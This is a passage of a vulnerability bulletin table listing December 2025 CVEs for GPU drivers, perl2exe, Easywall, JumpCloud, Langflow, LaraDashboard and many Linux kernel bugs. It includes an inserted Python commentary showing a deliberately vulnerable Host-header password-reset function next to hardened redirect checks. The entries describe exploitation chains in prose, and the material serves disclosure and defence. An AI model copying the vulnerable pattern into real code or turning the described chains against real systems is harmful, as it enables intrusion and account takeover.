| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to trigger reads of stale data that can lead to kernel exceptions and write use-after-free. The Use After Free common weakness enumeration was chosen as the stale data can include handles to resources in which the reference counts can become unbalanced. This can lead to the premature destruction of a resource while in use. | 2025-12-01 | not yet calculated | CVE-2025-58408 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| IndigoSTAR Software--perl2exe | perl2exe <= V30.10C contains an arbitrary code execution vulnerability that allows local authenticated attackers to execute malicious scripts. Attackers can control the 0th argument of packed executables to execute another executable, allowing them to bypass restrictions and gain unauthorized access. | 2025-12-04 | not yet calculated | CVE-2024-58278 | ExploitDB-51825 IndigoSTAR Software Homepage IndigoSTAR Software Download Page https://www.vulncheck.com/advisories/indigostar-software-perl2exe-v3010c-arbitrary-code-execution |
| Industrial Video & Control--Longwatch | A vulnerability in Longwatch devices allows unauthenticated HTTP GET requests to execute arbitrary code via an exposed endpoint, due to the absence of code signing and execution controls. Exploitation results in SYSTEM-level privileges. | 2025-12-02 | not yet calculated | CVE-2025-13658 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-336-01 |
| Iskra--iHUB and iHUB Lite | The Iskra iHUB and iHUB Lite smart metering gateway exposes its web management interface without requiring authentication, allowing unauthenticated users to access and modify critical device settings. | 2025-12-02 | not yet calculated | CVE-2025-13510 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-336-02 |
| jpylypiw--Easywall | Easywall 0.3.1 allows authenticated remote command execution via a command injection vulnerability in the /ports-save endpoint that suffers from a parameter injection flaw. Attackers can inject shell metacharacters to execute arbitrary commands on the server. | 2025-12-04 | not yet calculated | CVE-2024-58275 | ExploitDB-51856 Easywall Homepage Easywall GitHub Repository https://www.vulncheck.com/advisories/easywall-031-authentication-bypass-via-command-injection-in-ports-save-endpoint |
| JumpCloud Inc.--Remote Assist | JumpCloud Remote Assist for Windows versions prior to 0.317.0 include an uninstaller that is invoked by the JumpCloud Windows Agent as NT AUTHORITY\SYSTEM during agent uninstall or update operations. The Remote Assist uninstaller performs privileged create, write, execute, and delete actions on predictable files inside a user-writable %TEMP% subdirectory without validating that the directory is trusted or resetting its ACLs when it already exists. A local, low-privileged attacker can pre-create the directory with weak permissions and leverage mount-point or symbolic-link redirection to (a) coerce arbitrary file writes to protected locations, leading to denial of service (e.g., by overwriting sensitive system files), or (b) win a race to redirect DeleteFileW() to attacker-chosen targets, enabling arbitrary file or folder deletion and local privilege escalation to SYSTEM. This issue is fixed in JumpCloud Remote Assist 0.317.0 and affects Windows systems where Remote Assist is installed and managed through the Agent lifecycle. | 2025-12-02 | not yet calculated | CVE-2025-34352 | https://jumpcloud.com/platform/remote-assistance https://jumpcloud.com/support/list-of-jumpcloud-agent-release-notes https://www.vulncheck.com/advisories/jumpcloud-remote-assist-arbitrary-file-write-delete-via-insecure-temp-directory |
| jumpserver--jumpserver | JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to v3.10.19 and v4.10.5, the /core/i18n// endpoint uses the Referer header as the redirection target without proper validation, which could lead to an Open Redirect vulnerability. This vulnerability is fixed in v3.10.19 and v4.10.5. | 2025-12-01 | not yet calculated | CVE-2025-58044 | https://github.com/jumpserver/jumpserver/security/advisories/GHSA-h762-mj7p-jwjq https://github.com/jumpserver/jumpserver/commit/36ae076cb021f16d2053a63651bc16d15a3ed53b |
| Langflow--Langflow | Langflow versions up to and including 1.6.9 contain a chained vulnerability that enables account takeover and remote code execution. An overly permissive CORS configuration (allow_origins='*' with allow_credentials=True) combined with a refresh token cookie configured as SameSite=None allows a malicious webpage to perform cross-origin requests that include credentials and successfully call the refresh endpoint. An attacker-controlled origin can therefore obtain fresh access_token / refresh_token pairs for a victim session. Obtained tokens permit access to authenticated endpoints - including built-in code-execution functionality - allowing the attacker to execute arbitrary code and achieve full system compromise. | 2025-12-05 | not yet calculated | CVE-2025-34291 | https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform https://github.com/langflow-ai/langflow https://www.vulncheck.com/advisories/langflow-cors-misconfiguration-to-token-hijack-and-rce |
| laradashboard--laradashboard | LaraDashboard is an all-in-one solution to start a Laravel Application. In 2.3.0 and earlier, the password reset flow trusts the Host header, allowing attackers to redirect the administrator's reset token to an attacker-controlled server. This can be combined with the module installation process to automatically execute the ServiceProvider::boot() method, enabling arbitrary PHP code execution. | 2025-12-04 | not yet calculated | CVE-2025-66509 | https://github.com/laradashboard/laradashboard/security/advisories/GHSA-j9mm-c9cj-pc82 https://github.com/laradashboard/laradashboard/commit/cc42f9cdf8e59bce794ee2d812a9709b1e6efa87 |
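The JumpServer (Referer used as redirect target) and LaraDashboard (Host header used to build the password-reset link) entries are the same mistake: a request-supplied header decides where a user or a secret is sent. The block below is an added, language-neutral illustration in Python (not the code of either project, and the hostnames, paths and canonical base URL are assumed) of one allowlist check serving both cases: the redirect target is reduced to a same-site path, and the reset link is built from a configured base while an unexpected Host is refused outright. It also handles the `//evil.example` path trick that turns a "safe" relative redirect back into an absolute one.

```python
from urllib.parse import urlsplit, urlunsplit


def host_is_allowed(host: str, allowed_hosts) -> bool:
    """Exact, case-insensitive match of a hostname against the configured allowlist."""
    return host.lower() in {h.lower() for h in allowed_hosts}


def safe_redirect_target(referer: str, allowed_hosts, fallback: str = "/") -> str:
    """Open-redirect fix for the Referer case: follow it only when its host is
    ours, and re-emit just path+query so scheme and host can never be attacker-chosen."""
    if not referer:
        return fallback
    parts = urlsplit(referer)
    # urlsplit puts userinfo tricks like https://ours@evil.example in hostname=evil.example
    if parts.scheme not in ("http", "https") or not host_is_allowed(parts.hostname or "", allowed_hosts):
        return fallback
    # A path of //evil.example would be a protocol-relative URL once the scheme
    # and netloc are dropped; collapse leading slashes so it stays a local path.
    path = "/" + parts.path.lstrip("/")
    return urlunsplit(("", "", path, parts.query, ""))


def reset_link_from_host_header(host_header: str, token: str) -> str:
    """Vulnerable pattern as described for the LaraDashboard flow: the link base
    comes straight from Host, so a spoofed Host mails the token to the attacker."""
    return "https://%s/password/reset/%s" % (host_header, token)


def reset_link_hardened(host_header: str, token: str, allowed_hosts, canonical_base: str) -> str:
    """Hardened: never use Host for link building; use the configured canonical
    base, and refuse to serve the request at all if Host is not one of ours."""
    host = urlsplit("//" + host_header).hostname or ""   # strips port, handles IPv6 brackets
    if not host_is_allowed(host, allowed_hosts):
        raise ValueError("untrusted Host header: %r" % host_header)
    return "%s/password/reset/%s" % (canonical_base.rstrip("/"), token)
```

In a real Laravel or Django deployment the same two controls exist as configuration (a trusted-hosts middleware plus a fixed application URL) and should be used in preference to hand-rolled checks; the point of the code is to show what those settings are protecting against.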
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Initialise scc_index in unix_add_edge(). Quang Le reported that the AF_UNIX GC could garbage-collect a receive queue of an alive in-flight socket, with a nice repro. The repro consists of three stages. 1) 1-a. Create a single cyclic reference with many sockets 1-b. close() all sockets 1-c. Trigger GC 2) 2-a. Pass sk-A to an embryo sk-B 2-b. Pass sk-X to sk-X 2-c. Trigger GC 3) 3-a. accept() the embryo sk-B 3-b. Pass sk-B to sk-C 3-c. close() the in-flight sk-A 3-d. Trigger GC As of 2-c, sk-A and sk-X are linked to unix_unvisited_vertices, and unix_walk_scc() groups them into two different SCCs: unix_sk(sk-A)->vertex->scc_index = 2 (UNIX_VERTEX_INDEX_START) unix_sk(sk-X)->vertex->scc_index = 3 Once GC completes, unix_graph_grouped is set to true. Also, unix_graph_maybe_cyclic is set to true due to sk-X's cyclic self-reference, which makes close() trigger GC. At 3-b, unix_add_edge() allocates unix_sk(sk-B)->vertex and links it to unix_unvisited_vertices. unix_update_graph() is called at 3-a. and 3-b., but neither unix_graph_grouped nor unix_graph_maybe_cyclic is changed because both sk-B's listener and sk-C are not in-flight. 3-c decrements sk-A's file refcnt to 1. Since unix_graph_grouped is true at 3-d, unix_walk_scc_fast() is finally called and iterates 3 sockets sk-A, sk-B, and sk-X: sk-A -> sk-B (-> sk-C) sk-X -> sk-X This is totally fine. All of them are not yet close()d and should be grouped into different SCCs. However, unix_vertex_dead() misjudges that sk-A and sk-B are in the same SCC and sk-A is dead. unix_sk(sk-A)->scc_index == unix_sk(sk-B)->scc_index <-- Wrong! && sk-A's file refcnt == unix_sk(sk-A)->vertex->out_degree ^-- 1 in-flight count for sk-B -> sk-A is dead !? The problem is that unix_add_edge() does not initialise scc_index. Stage 1) is used for heap spraying, making a newly allocated vertex have vertex->scc_index == 2 (UNIX_VERTEX_INDEX_START) set by unix_walk_scc() at 1-c. Let's track the max SCC index from the previous unix_walk_scc() call and assign the max + 1 to a new vertex's scc_index. This way, we can continue to avoid Tarjan's algorithm while preventing misjudgments. | 2025-12-04 | not yet calculated | CVE-2025-40214 | https://git.kernel.org/stable/c/20003fbb9174121b27bd1da6ebe61542ac4c327d https://git.kernel.org/stable/c/4cd8d755c7d4f515dd9abf483316aca2f1b7b0f3 https://git.kernel.org/stable/c/db81ad20fd8aef7cc7d536c52ee5ea4c1f979128 https://git.kernel.org/stable/c/1aa7e40ee850c9053e769957ce6541173891204d https://git.kernel.org/stable/c/60e6489f8e3b086bd1130ad4450a2c112e863791 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: delete x->tunnel as we delete x The ipcomp fallback tunnels currently get deleted (from the various lists and hashtables) as the last user state that needed that fallback is destroyed (not deleted). If a reference to that user state still exists, the fallback state will remain on the hashtables/lists, triggering the WARN in xfrm_state_fini. Because of those remaining references, the fix in commit f75a2804da39 ("xfrm: destroy xfrm_state synchronously on net exit path") is not complete. We recently fixed one such situation in TCP due to deferred freeing of skbs (commit 9b6412e6979f ("tcp: drop secpath at the same time as we currently drop dst")). This can also happen due to IP reassembly: skbs with a secpath remain on the reassembly queue until netns destruction. If we can't guarantee that the queues are flushed by the time xfrm_state_fini runs, there may still be references to a (user) xfrm_state, preventing the timely deletion of the corresponding fallback state. Instead of chasing each instance of skbs holding a secpath one by one, this patch fixes the issue directly within xfrm, by deleting the fallback state as soon as the last user state depending on it has been deleted. Destruction will still happen when the final reference is dropped. A separate lockdep class for the fallback state is required since we're going to lock x->tunnel while x is locked. | 2025-12-04 | not yet calculated | CVE-2025-40215 | https://git.kernel.org/stable/c/b441cf3f8c4b8576639d20c8eb4aa32917602ecd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/rsrc: don't rely on user vaddr alignment There is no guaranteed alignment for user pointers, however the calculation of an offset of the first page into a folio after coalescing uses some weird bit mask logic, get rid of it. | 2025-12-04 | not yet calculated | CVE-2025-40216 | https://git.kernel.org/stable/c/50998b0ae7d9d552e96d8b7239981cf05f65eff5 https://git.kernel.org/stable/c/f16769241594be59387b56ab525e327f54377e60 https://git.kernel.org/stable/c/3a3c6d61577dbb23c09df3e21f6f9eda1ecd634b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pidfs: validate extensible ioctls Validate extensible ioctls more strictly than we do now. | 2025-12-04 | not yet calculated | CVE-2025-40217 | https://git.kernel.org/stable/c/bf0fbf5e8b0aff8a4a0fb35e32b10083baa83c04 https://git.kernel.org/stable/c/3c17001b21b9f168c957ced9384abe969019b609 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/vaddr: do not repeat pte_offset_map_lock() until success DAMON's virtual address space operation set implementation (vaddr) calls pte_offset_map_lock() inside the page table walk callback function. This is for reading and writing page table accessed bits. If pte_offset_map_lock() fails, it retries by returning the page table walk callback function with ACTION_AGAIN. pte_offset_map_lock() can continuously fail if the target is a pmd migration entry, though. Hence it could cause an infinite page table walk if the migration cannot be done until the page table walk is finished. This indeed caused a soft lockup when CPU hotplugging and DAMON were running in parallel. Avoid the infinite loop by simply not retrying the page table walk. DAMON is promising only a best-effort accuracy, so missing access to such pages is no problem. | 2025-12-04 | not yet calculated | CVE-2025-40218 | https://git.kernel.org/stable/c/677ebfe5d00f94adec0c0204f6e6e2a82d3f77bf https://git.kernel.org/stable/c/ac42320ec873bfe726141069cfdd90ee5bc4e885 https://git.kernel.org/stable/c/0ccd91cf749536d41307a07e60ec14ab0dbf21f5 https://git.kernel.org/stable/c/b93af2cc8e036754c0d9970d9ddc47f43cc94b9f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/IOV: Add PCI rescan-remove locking when enabling/disabling SR-IOV Before disabling SR-IOV via config space accesses to the parent PF, sriov_disable() first removes the PCI devices representing the VFs. Since commit 9d16947b7583 ("PCI: Add global pci_lock_rescan_remove()") such removal operations are serialized against concurrent remove and rescan using the pci_rescan_remove_lock. No such locking was ever added in sriov_disable() however. In particular when commit 18f9e9d150fc ("PCI/IOV: Factor out sriov_add_vfs()") factored out the PCI device removal into sriov_del_vfs() there was still no locking around the pci_iov_remove_virtfn() calls. On s390 the lack of serialization in sriov_disable() may cause double remove and list corruption with the below (amended) trace being observed: PSW: 0704c00180000000 0000000c914e4b38 (klist_put+56) GPRS: 000003800313fb48 0000000000000000 0000000100000001 0000000000000001 00000000f9b520a8 0000000000000000 0000000000002fbd 00000000f4cc9480 0000000000000001 0000000000000000 0000000000000000 0000000180692828 00000000818e8000 000003800313fe2c 000003800313fb20 000003800313fad8 #0 [3800313fb20] device_del at c9158ad5c #1 [3800313fb88] pci_remove_bus_device at c915105ba #2 [3800313fbd0] pci_iov_remove_virtfn at c9152f198 #3 [3800313fc28] zpci_iov_remove_virtfn at c90fb67c0 #4 [3800313fc60] zpci_bus_remove_device at c90fb6104 #5 [3800313fca0] __zpci_event_availability at c90fb3dca #6 [3800313fd08] chsc_process_sei_nt0 at c918fe4a2 #7 [3800313fd60] crw_collect_info at c91905822 #8 [3800313fe10] kthread at c90feb390 #9 [3800313fe68] __ret_from_fork at c90f6aa64 #10 [3800313fe98] ret_from_fork at c9194f3f2. This is because in addition to sriov_disable() removing the VFs, the platform also generates hot-unplug events for the VFs. This being the reverse operation to the hotplug events generated by sriov_enable() and handled via pdev->no_vf_scan. And while the event processing takes pci_rescan_remove_lock and checks whether the struct pci_dev still exists, the lack of synchronization makes this checking racy. Other races may also be possible of course though given that this lack of locking persisted so long observable races seem very rare. Even on s390 the list corruption was only observed with certain devices since the platform events are only triggered by config accesses after the removal, so as long as the removal finished synchronously they would not race. Either way the locking is missing so fix this by adding it to the sriov_del_vfs() helper. Just like PCI rescan-remove, locking is also missing in sriov_add_vfs() including for the error case where pci_stop_and_remove_bus_device() is called without the PCI rescan-remove lock being held. Even in the non-error case, adding new PCI devices and buses should be serialized via the PCI rescan-remove lock. Add the necessary locking. | 2025-12-04 | not yet calculated | CVE-2025-40219 | https://git.kernel.org/stable/c/5c1cd7d405e94dc6cb320cc0cc092b74895b6ddf https://git.kernel.org/stable/c/1e8a80290f964bdbad225221c8a1594c7e01c8fd https://git.kernel.org/stable/c/a645ca21de09e3137cbb224fa6c23cca873a1d01 https://git.kernel.org/stable/c/a24219172456f035d886857e265ca24c85b167c8 https://git.kernel.org/stable/c/36039348bca77828bf06eae41b8f76e38cd15847 https://git.kernel.org/stable/c/53154cd40ccf285f1d1c24367824082061d155bd https://git.kernel.org/stable/c/ee40e5db052d7c6f406fdb95ad639c894c74674c https://git.kernel.org/stable/c/05703271c3cdcc0f2a8cf6ebdc45892b8ca83520 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fuse: fix livelock in synchronous file put from fuseblk workers I observed a hang when running generic/323 against a fuseblk server. This test opens a file, initiates a lot of AIO writes to that file descriptor, and closes the file descriptor before the writes complete. Unsurprisingly, the AIO exerciser threads are mostly stuck waiting for responses from the fuseblk server: # cat /proc/372265/task/372313/stack [<0>] request_wait_answer+0x1fe/0x2a0 [fuse] [<0>] __fuse_simple_request+0xd3/0x2b0 [fuse] [<0>] fuse_do_getattr+0xfc/0x1f0 [fuse] [<0>] fuse_file_read_iter+0xbe/0x1c0 [fuse] [<0>] aio_read+0x130/0x1e0 [<0>] io_submit_one+0x542/0x860 [<0>] __x64_sys_io_submit+0x98/0x1a0 [<0>] do_syscall_64+0x37/0xf0 [<0>] entry_SYSCALL_64_after_hwframe+0x4b/0x53 But the /weird/ part is that the fuseblk server threads are waiting for responses from itself: # cat /proc/372210/task/372232/stack [<0>] request_wait_answer+0x1fe/0x2a0 [fuse] [<0>] __fuse_simple_request+0xd3/0x2b0 [fuse] [<0>] fuse_file_put+0x9a/0xd0 [fuse] [<0>] fuse_release+0x36/0x50 [fuse] [<0>] __fput+0xec/0x2b0 [<0>] task_work_run+0x55/0x90 [<0>] syscall_exit_to_user_mode+0xe9/0x100 [<0>] do_syscall_64+0x43/0xf0 [<0>] entry_SYSCALL_64_after_hwframe+0x4b/0x53 The fuseblk server is fuse2fs so there's nothing all that exciting in the server itself. So why is the fuse server calling fuse_file_put? The commit message for the fstest sheds some light on that: "By closing the file descriptor before calling io_destroy, you pretty much guarantee that the last put on the ioctx will be done in interrupt context (during I/O completion). Aha. AIO fgets a new struct file from the fd when it queues the ioctx. The completion of the FUSE_WRITE command from userspace causes the fuse server to call the AIO completion function. The completion puts the struct file, queuing a delayed fput to the fuse server task. When the fuse server task returns to userspace, it has to run the delayed fput, which in the case of a fuseblk server, it does synchronously. Sending the FUSE_RELEASE command synchronously from fuse server threads is a bad idea because a client program can initiate enough simultaneous AIOs such that all the fuse server threads end up in delayed_fput, and now there aren't any threads left to handle the queued fuse commands. Fix this by only using asynchronous fputs when closing files, and leave a comment explaining why. | 2025-12-04 | not yet calculated | CVE-2025-40220 | https://git.kernel.org/stable/c/548e1f2bac1d4df91a6138f26bb4ab00323fd948 https://git.kernel.org/stable/c/cfd1aa3e2b71f3327cb373c45a897c9028c62b35 https://git.kernel.org/stable/c/83b375c6efef69b1066ad2d79601221e7892745a https://git.kernel.org/stable/c/bfd17b6138df0122a95989457d8e18ce0b86165e https://git.kernel.org/stable/c/b26923512dbe57ae4917bafd31396d22a9d1691a https://git.kernel.org/stable/c/f19a1390af448d9e193c08e28ea5f727bf3c3049 https://git.kernel.org/stable/c/26e5c67deb2e1f42a951f022fdf5b9f7eb747b01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: pci: mg4b: fix uninitialized iio scan data Fix potential leak of uninitialized stack data to userspace by ensuring that the `scan` structure is zeroed before use. | 2025-12-04 | not yet calculated | CVE-2025-40221 | https://git.kernel.org/stable/c/b7f82da7f86479cb6479a76ebe213ece7c77398f https://git.kernel.org/stable/c/b792eba44494b4e6ab5006013335f9819f303b8b https://git.kernel.org/stable/c/c0d3f6969bb4d72476cfe7ea9263831f1c283704 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tty: serial: sh-sci: fix RSCI FIFO overrun handling The receive error handling code is shared between RSCI and all other SCIF port types, but the RSCI overrun_reg is specified as a memory offset, while for other SCIF types it is an enum value used to index into the sci_port_params->regs array, as mentioned above the sci_serial_in() function. For RSCI, the overrun_reg is CSR (0x48), causing the sci_getreg() call inside the sci_handle_fifo_overrun() function to index outside the bounds of the regs array, which currently has a size of 20, as specified by SCI_NR_REGS. Because of this, we end up accessing memory outside of RSCI's rsci_port_params structure, which, when interpreted as a plat_sci_reg, happens to have a non-zero size, causing the following WARN when sci_serial_in() is called, as the accidental size does not match the supported register sizes. The existence of the overrun_reg needs to be checked because SCIx_SH3_SCIF_REGTYPE has overrun_reg set to SCLSR, but SCLSR is not present in the regs array. Avoid calling sci_getreg() for port types which don't use standard register handling. Use the ops->read_reg() and ops->write_reg() functions to properly read and write registers for RSCI, and change the type of the status variable to accommodate the 32-bit CSR register. sci_getreg() and sci_serial_in() are also called with overrun_reg in the sci_mpxed_interrupt() interrupt handler, but that code path is not used for RSCI, as it does not have a muxed interrupt. ------------[ cut here ]------------ Invalid register access WARNING: CPU: 0 PID: 0 at drivers/tty/serial/sh-sci.c:522 sci_serial_in+0x38/0xac Modules linked in: renesas_usbhs at24 rzt2h_adc industrialio_adc sha256 cfg80211 bluetooth ecdh_generic ecc rfkill fuse drm backlight ipv6 CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.17.0-rc1+ #30 PREEMPT Hardware name: Renesas RZ/T2H EVK Board based on r9a09g077m44 (DT) pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : sci_serial_in+0x38/0xac lr : sci_serial_in+0x38/0xac sp : ffff800080003e80 x29: ffff800080003e80 x28: ffff800082195b80 x27: 000000000000000d x26: ffff8000821956d0 x25: 0000000000000000 x24: ffff800082195b80 x23: ffff000180e0d800 x22: 0000000000000010 x21: 0000000000000000 x20: 0000000000000010 x19: ffff000180e72000 x18: 000000000000000a x17: ffff8002bcee7000 x16: ffff800080000000 x15: 0720072007200720 x14: 0720072007200720 x13: 0720072007200720 x12: 0720072007200720 x11: 0000000000000058 x10: 0000000000000018 x9 : ffff8000821a6a48 x8 : 0000000000057fa8 x7 : 0000000000000406 x6 : ffff8000821fea48 x5 : ffff00033ef88408 x4 : ffff8002bcee7000 x3 : ffff800082195b80 x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff800082195b80 Call trace: sci_serial_in+0x38/0xac (P) sci_handle_fifo_overrun.isra.0+0x70/0x134 sci_er_interrupt+0x50/0x39c __handle_irq_event_percpu+0x48/0x140 handle_irq_event+0x44/0xb0 handle_fasteoi_irq+0xf4/0x1a0 handle_irq_desc+0x34/0x58 generic_handle_domain_irq+0x1c/0x28 gic_handle_irq+0x4c/0x140 call_on_irq_stack+0x30/0x48 do_interrupt_handler+0x80/0x84 el1_interrupt+0x34/0x68 el1h_64_irq_handler+0x18/0x24 el1h_64_irq+0x6c/0x70 default_idle_call+0x28/0x58 (P) do_idle+0x1f8/0x250 cpu_startup_entry+0x34/0x3c rest_init+0xd8/0xe0 console_on_rootfs+0x0/0x6c __primary_switched+0x88/0x90 ---[ end trace 0000000000000000 ]--- | 2025-12-04 | not yet calculated | CVE-2025-40222 | https://git.kernel.org/stable/c/2ec9bbd09a6cdf5b8c726be34f29630faf585d07 https://git.kernel.org/stable/c/ef8fef45c74b5a0059488fda2df65fa133f7d7d0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: most: usb: Fix use-after-free in hdm_disconnect hdm_disconnect() calls most_deregister_interface(), which eventually unregisters the MOST interface device with device_unregister(iface->dev). If that drops the last reference, the device core may call release_mdev() immediately while hdm_disconnect() is still executing. The old code also freed several mdev-owned allocations in hdm_disconnect() and then performed additional put_device() calls. Depending on refcount order, this could lead to use-after-free or double-free when release_mdev() ran (or when unregister paths also performed puts). Fix by moving the frees of mdev-owned allocations into release_mdev(), so they happen exactly once when the device is truly released, and by dropping the extra put_device() calls in hdm_disconnect() that are redundant after device_unregister() and most_deregister_interface(). This addresses the KASAN slab-use-after-free reported by syzbot in hdm_disconnect(). See report and stack traces in the bug link below. | 2025-12-04 | not yet calculated | CVE-2025-40223 | https://git.kernel.org/stable/c/5b5c478f09b1b35e7fe6fc9a1786c9bf6030e831 https://git.kernel.org/stable/c/578eb18cd111addec94c43f61cd4b4429e454809 https://git.kernel.org/stable/c/33daf469f5294b9d07c4fc98216cace9f4f34cc6 https://git.kernel.org/stable/c/72427dc6f87523995f4e6ae35a948bb2992cabce https://git.kernel.org/stable/c/f93a84ffb884d761a9d4e869ba29c238711e81f1 https://git.kernel.org/stable/c/3a3b8e89c7201c5b3b76ac4a4069d1adde1477d6 https://git.kernel.org/stable/c/4b1270902609ef0d935ed2faa2ea6d122bd148f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (cgbc-hwmon) Add missing NULL check after devm_kzalloc() The driver allocates memory for sensor data using devm_kzalloc(), but did not check if the allocation succeeded. In case of memory allocation failure, dereferencing the NULL pointer would lead to a kernel crash. Add a NULL pointer check and return -ENOMEM to handle allocation failure properly. | 2025-12-04 | not yet calculated | CVE-2025-40224 | https://git.kernel.org/stable/c/240b82b86a091c1aa49d951d4467425420a081a0 https://git.kernel.org/stable/c/a09a5aa8bf258ddc99a22c30f17fe304b96b5350 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Fix kernel panic on partial unmap of a GPU VA region This commit addresses a kernel panic issue that can happen if Userspace tries to partially unmap a GPU virtual region (aka drm_gpuva). The VM_BIND interface allows partial unmapping of a BO. Panthor driver pre-allocates memory for the new drm_gpuva structures that would be needed for the map/unmap operation, done using drm_gpuvm layer. It expected that only one new drm_gpuva would be needed on unmap but a partial unmap can require 2 new drm_gpuva and that's why it ended up doing a NULL pointer dereference causing a kernel panic. Following dump was seen when partial unmap was exercised. Unable to handle kernel NULL pointer dereference at virtual address 0000000000000078 Mem abort info: ESR = 0x0000000096000046 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x06: level 2 translation fault Data abort info: ISV = 0, ISS = 0x00000046, ISS2 = 0x00000000 CM = 0, WnR = 1, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=000000088a863000 [000000000000078] pgd=080000088a842003, p4d=080000088a842003, pud=0800000884bf5003, pmd=0000000000000000 Internal error: Oops: 0000000096000046 [#1] PREEMPT SMP <snip> pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : panthor_gpuva_sm_step_remap+0xe4/0x330 [panthor] lr : panthor_gpuva_sm_step_remap+0x6c/0x330 [panthor] sp : ffff800085d43970 x29: ffff800085d43970 x28: ffff00080363e440 x27: ffff0008090c6000 x26: 0000000000000030 x25: ffff800085d439f8 x24: ffff00080d402000 x23: ffff800085d43b60 x22: ffff800085d439e0 x21: ffff00080abdb180 x20: 0000000000000000 x19: 0000000000000000 x18: 0000000000000010 x17: 6e656c202c303030 x16: 3666666666646466 x15: 393d61766f69202c x14: 312d3d7361203a70 x13: 303030323d6e656c x12: ffff80008324bf58 x11: 0000000000000003 x10: 0000000000000002 x9 : ffff8000801a6a9c x8 : ffff00080360b300 x7 : 0000000000000000 x6 : 000000088aa35fc7 x5 : fff1000080000000 x4 : ffff8000842ddd30 x3 : 0000000000000001 x2 : 0000000100000000 x1 : 0000000000000001 x0 : 0000000000000078 Call trace: panthor_gpuva_sm_step_remap+0xe4/0x330 [panthor] op_remap_cb.isra.22+0x50/0x80 __drm_gpuvm_sm_unmap+0x10c/0x1c8 drm_gpuvm_sm_unmap+0x40/0x60 panthor_vm_exec_op+0xb4/0x3d0 [panthor] panthor_vm_bind_exec_sync_op+0x154/0x278 [panthor] panthor_ioctl_vm_bind+0x160/0x4a0 [panthor] drm_ioctl_kernel+0xbc/0x138 drm_ioctl+0x240/0x500 __arm64_sys_ioctl+0xb0/0xf8 invoke_syscall+0x4c/0x110 el0_svc_common.constprop.1+0x98/0xf8 do_el0_svc+0x24/0x38 el0_svc+0x40/0xf8 el0t_64_sync_handler+0xa0/0xc8 el0t_64_sync+0x174/0x178 | 2025-12-04 | not yet calculated | CVE-2025-40225 | https://git.kernel.org/stable/c/efe6dced3512066ebee2cf7c4c38d1c99625814e https://git.kernel.org/stable/c/e9c19d19dd7e08db89cead5b0337c18590dc6645 https://git.kernel.org/stable/c/4eabd0d8791eaf9a7b114ccbf56eb488aefe7b1f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: arm_scmi: Account for failed debug initialization When the SCMI debug subsystem fails to initialize, the related debug root will be missing, and the underlying descriptor will be NULL. Handle this fault condition in the SCMI debug helpers that maintain metrics counters. | 2025-12-04 | not yet calculated | CVE-2025-40226 | https://git.kernel.org/stable/c/d719ce9f286c439795cd2beee4c91f12b84bc5a0 https://git.kernel.org/stable/c/e088efcd97cb7c7297d166bb52c3b87a29f6a0b1 https://git.kernel.org/stable/c/554c9d5c6c695aedaecfb4365c187102709397b0 https://git.kernel.org/stable/c/2290ab43b9d8eafb8046387f10a8dfa2b030ba46 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/sysfs: dealloc commit test ctx always The damon_ctx for testing online DAMON parameters commit inputs is deallocated only when the test fails. This means memory is leaked for every successful online DAMON parameters commit. Fix the leak by always deallocating it. | 2025-12-04 | not yet calculated | CVE-2025-40227 | https://git.kernel.org/stable/c/ba236520ae53418859f4b7c7de3c71478d3c0b5a https://git.kernel.org/stable/c/139e7a572af0b45f558b5e502121a768dc328ba8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/sysfs: catch commit test ctx alloc failure Patch series "mm/damon/sysfs: fix commit test damon_ctx [de]allocation". DAMON sysfs interface dynamically allocates and uses a damon_ctx object for testing if given inputs for online DAMON parameters update are valid. The object is being used without an allocation failure check, and leaked when the test succeeds. Fix the two bugs. This patch (of 2): The damon_ctx for testing online DAMON parameters commit inputs is used without its allocation failure check. This could result in an invalid memory access. Fix it by directly returning an error when the allocation failed. | 2025-12-04 | not yet calculated | CVE-2025-40228 | https://git.kernel.org/stable/c/5b3609d9b9650bdea0bfdf643e0ce57e1aed67fc https://git.kernel.org/stable/c/f0c5118ebb0eb7e4fd6f0d2ace3315ca141b317f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: fix potential memory leak by cleaning ops_filter in damon_destroy_scheme Currently, damon_destroy_scheme() only cleans up the filter list but leaves ops_filter untouched, which could lead to memory leaks when a scheme is destroyed. This patch ensures both filter and ops_filter are properly freed in damon_destroy_scheme(), preventing potential memory leaks. | 2025-12-04 | not yet calculated | CVE-2025-40229 | https://git.kernel.org/stable/c/ff8dcf621a4172f4a6d42cbbb25d21659d3ac300 https://git.kernel.org/stable/c/7071537159be845a5c4ed5fb7d3db25aa4bd04a3 |
